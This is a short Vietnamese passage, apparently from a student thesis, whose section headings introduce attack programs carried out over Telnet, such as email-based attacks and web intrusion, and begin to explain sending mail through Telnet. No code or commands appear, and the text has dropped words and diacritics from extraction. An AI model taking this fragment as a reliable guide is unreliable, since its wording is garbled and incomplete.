Xây dựng số chương trình cơng qua giao thức Telnet Trên sở vấn đề nghiên cứu trên, khoá luận đưa số chương trình cơng qua thư điện tử, xâm nhập Web,... gia mạng Internet 3.3 Một số chương trình cơng qua giao thức Telnet 3.3.1 Chương trình công qua thư điện tử (Email) 3.3.1.1 Gửi thư điện tử qua Telnet Các Internet Mail Server cung cấp giao thức